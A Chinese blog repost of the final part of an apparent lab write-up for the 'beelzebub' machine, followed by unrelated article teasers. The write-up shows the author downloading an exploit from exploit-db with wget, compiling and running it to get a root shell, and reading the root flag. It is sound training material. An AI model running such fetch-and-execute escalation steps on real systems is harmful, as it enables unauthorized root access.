 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

516 packages can be updated.
388 updates are security updates.

New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Mar 20 00:38:04 2021 from 192.168.1.7
krampus@beelzebub:~$

提权

查看.bash_history,看到提权的方法

krampus@beelzebub:~$ ls -al
total 104
drwsrwxrwx 17 krampus krampus  4096 Mar 20  2021 .
drwxr-xr-x  3 root    root     4096 Mar 16  2021 ..
-rw-------  1 krampus krampus  1407 Mar 20  2021 .bash_history
drwx------ 11 krampus krampus  4096 Mar 20  2021 .cache
drwxrwxrwx 14 krampus krampus  4096 May 26  2020 .config
drwxrwxrwx  3 krampus krampus  4096 Oct 20  2019 .dbus
drwxrwxrwx  2 krampus krampus  4096 Mar 19  2021 Desktop
........

krampus@beelzebub:~$ cat .bash_history 
.....
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit 
....

提权,flag

krampus@beelzebub:~$ cd /tmp
krampus@beelzebub:/tmp$ wget https://www.exploit-db.com/download/47009
--2024-02-06 19:54:50--  https://www.exploit-db.com/download/47009
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 619 [application/txt]
Saving to: ‘47009’

47009                                        100%[==============================================================================================>]     619  --.-KB/s    in 0s      

2024-02-06 19:54:51 (95.8 MB/s) - ‘47009’ saved [619/619]

krampus@beelzebub:/tmp$ mv 47009 ./shell.c
krampus@beelzebub:/tmp$ gcc shell.c -o shell
krampus@beelzebub:/tmp$ chmod +x shell
krampus@beelzebub:/tmp$ ./shell
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)
opening root shell
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)
# cd /root
# ls
root.txt
# cat root.txt
8955qpasq8qq807879p75e1rr24cr1a5

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1436904.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

day28打卡

day28打卡 93. 复原 IP 地址 见注释 class Solution { public:vector<string> ret;vector<string> restoreIpAddresses(string s) {string ip;dfs(s, 0, ip);return ret;}//n记录小数点个数void dfs(string s, int n, string ip){//n为4if(n 4){//如果字符s没有…

2024Node.js零基础教程(小白友好型),nodejs新手到高手,(四)NodeJS入门——网络基础概念

041_网络基础概念_IP的介绍 hello&#xff0c;大家好&#xff0c;我们来一起认识一下IP。 在开始介绍 IP 之前&#xff0c;我们首先来介绍一个场景&#xff0c;方便大家去理解 IP 这个概念。比如这会儿强哥正在成都&#xff0c;然后还有另外一个小伙伴&#xff0c;谁呢&#x…

数据库分库分表:提升系统性能的必由之路

欢迎来到我的博客&#xff0c;代码的世界里&#xff0c;每一行都是一个故事 数据库分库分表&#xff1a;提升系统性能的必由之路 前言为什么分库分表是必要的分库分表的基本概念和原理性能提升和负载均衡 前言 在数字化时代&#xff0c;数据被认为是企业最宝贵的资产之一。然而…

STA双WiFi连接

STA双WiFi连接 1、STA/STA双WiFi开关1.1 相关属性1.2 STA/STA支持判断 2、STA双WiFi命令测试2.1 adb shell cmd wifi add-suggestion guest_5G wpa3 12345678 -p2.2 adb shell cmd wifi remove-suggestion guest_5G2.3 查看dumpsys wifi信息WifiConfigStore 3、STA双WiFi连接流…

Graal编译器和GraalVM虚拟机

文章目录 说明Java程序执行流程JVM的语言无关性JVM的执行流程执行引擎的两种行为&#xff1a;解释执行和编译热点代码和热点代码探测方式热点代码热点代码探测方式热点代码探测方式流程 HotSpotVM内嵌两个JIT编译器Graal编译器GraalVMGraalVM虚拟机安装和体验GraalVM的下载和安…

【JavaEE】_传输层协议UDP与TCP

目录 1. 开发中常见的数据组织格式 1.1 XML 1.2 JSON 1.3 Protobuf 2. 端口号 3. UDP协议 4. TCP协议 4.1 特点 4.2 TCP报文格式 4.3 TCP可靠性机制 4.3.1 确认应答机制 4.3.2 超时重传机制 4.3.2.1 丢包的两种情况 4.3.2.2 重传时间 4.3.3 连接管理机制 4.3.3…

【Flink入门修炼】1-2 Mac 搭建 Flink 源码阅读环境

在后面学习 Flink 相关知识时&#xff0c;会深入源码探究其实现机制。因此&#xff0c;需要现在本地配置好源码阅读环境。 本文搭建环境&#xff1a; Mac M1&#xff08;Apple Silicon&#xff09;Java 8IDEAFlink 官方源码 一、 下载 Flink 源码 github 地址&#xff1a;h…

【Vue3+Vite】Vue生命周期与组件 快速学习 第三期

文章目录 一、Vue生命周期1.1 生命周期简介1.2 生命周期案例 二、Vue组件2.1 组件基础2.2 组件化入门案例2.3 组件之间传递数据2.3.1父传子2.3.2 子传父2.3.3 兄弟传参 总结 一、Vue生命周期 1.1 生命周期简介 每个 Vue 组件实例在创建时都需要经历一系列的初始化步骤&#xf…

UE5 获得频谱让nigara随音乐律动

参考视频:UE - Niagara实现可视化音乐动态粒子效果 案例演示及教程_哔哩哔哩_bilibili 先创建一个Niagara 在Properties的Sim Target改为GPU,Calculate Bounds Mode改为Fixed模式 生成的数量改为1000 这里的BoxSize可以选择修改,具体作用是粒子初始生成的范围 Drag,阻力,用来限…

数据结构_找环,破环题-2.5

一. 判断单链表有无环 a. 错误的思路&#xff1a;遍历陷入死循环 1&#xff09;和相交的遍历思路一样&#xff0c;找指向相同。 错误点 一直在死循环。 思考点&#xff1a;如何破环 b. 个人思路&#xff1a;反转链表回首结点 1&#xff09;目前的经验&#xff0c;无非就…

浅谈应该遵守的伦敦银交易规则

做伦敦银投资的朋友应遵守伦敦银交易规则&#xff0c;伦敦银交易规则不是指那些伦敦银交易技巧&#xff0c;而是在这个市场中要遵循的一些约定&#xff0c;下面我们就来讨论一下。 风险管理。风险管理即指投资者控制自己一笔乃至整体交易的风险&#xff0c;没有风险管理意识的投…

Vue 条件渲染 双向绑定

https://www.dedao.cn/ebook/reader?id5lZOKpMGr9mgdOvYa6Ej75XRo1NML3jx810k8ZVzb2nqPpDxBeJlK4AyQ8RPQv2z v-if实现条件渲染的功能。v-model实现双向数据传输。 v-model用来进行双向绑定&#xff0c;当输入框中的文字变化时&#xff0c;其会将变化同步到绑定的变量上&#…

【敏感词】敏感词检测功能v1.1.0版本正式上线

背景 为了解决系统发布信息时人工审核成本高的问题&#xff0c;开发一个敏感词检测系统。该系统能够自动检测用户输入的内容中是否包含敏感词&#xff0c;从而减少不合规内容的发布&#xff0c;降低人工审核成本。通过实施这个系统&#xff0c;可以提高信息发布的效率和准确性…

ArraysLambda表达式

目录 一、Arrays 1、Arrays操作数组的工具类​编辑 二、Lambda表达式 1、Lambda初体验 ​编辑 2、函数式编程 ​编辑 3、Lambda表达式的标准格式 3.1 示例代码 4、小结 ​编辑5、Lambda表达式的省略写法 ​编辑5.1 示例代码 5.2 小结 ​编辑6、Lambda表达式的练习 …

redis源码之:集群创建与节点通信(2)

在上一篇redis源码之&#xff1a;集群创建与节点通信&#xff08;1&#xff09;我们可知&#xff0c;在集群中&#xff0c;cluster节点之间&#xff0c;通过meet将对方加入到本方的cluster->nodes列表中&#xff0c;并在后续过程中&#xff0c;不断通过clusterSendPing发送p…

Jmeter 示例,格式为001-100,按顺序生成三位数的函数

1.先添加一个循环控制器&#xff0c;每次执行生成一个数, 2.添加一个beanshell Sample,编写代码,把按00X这个格式的数字&#xff0c;赋值给一个变量LoopCount // 从JMeter变量中获取当前的计数器值 String loopCountStr vars.get("LoopCount"); int loopCount (lo…

maven依赖报错处理(或者maven怎么刷新都下载不了依赖)

maven依赖报错&#xff0c;或者不报错&#xff0c;但是怎么刷新maven都没反应&#xff0c;可以试一下以下操作 当下载jar的时候&#xff0c;如果断网&#xff0c;或者连接超时的时候&#xff0c;会自动在文件夹中创建一个名为*lastupdate的文件&#xff0c;当有了这个文件之后…

代理与Reflect反射

属性描述符 Proprety Descriptor 属性描述符 用于描述一个属性的相关信息 1.Object.getOwnPropertyDescriptor(对象&#xff0c;属性名) 可以得到一个对象的 某个属性的属性描述符 Object.getOwnPropertyDescriptors(对象) 可以得到某个对象的所有属性描述符 如果需要为某个…

数据库学习笔记2024/2/4

随笔 怎么学? 1、MySQL数据库就是存储和管理数据的一个大型软件,这个软件有一个专门的语言叫SQL,主要学的是SQL语言,但想要达到企业用人标准,就还得学会熟练使用MySQL这个软件。 2、学习分三阶段: 一. 基础篇 1. MySQL概述 1.1 数据库相关概念 数据库管理系统 -> MyS…

如何修改远程端服务器密钥

前言 一段时间没改密码后&#xff0c;远程就会自动提示CtrlAltEnd键修改密码。但我电脑是笔记本&#xff0c;没有end键。打开屏幕键盘按这三个键也没用。 解决方法 打开远程 1、远程端WINC 输入osk 可以发现打开了屏幕键盘 2、电脑键盘同时按住CtrlAlt&#xff08;若自身电…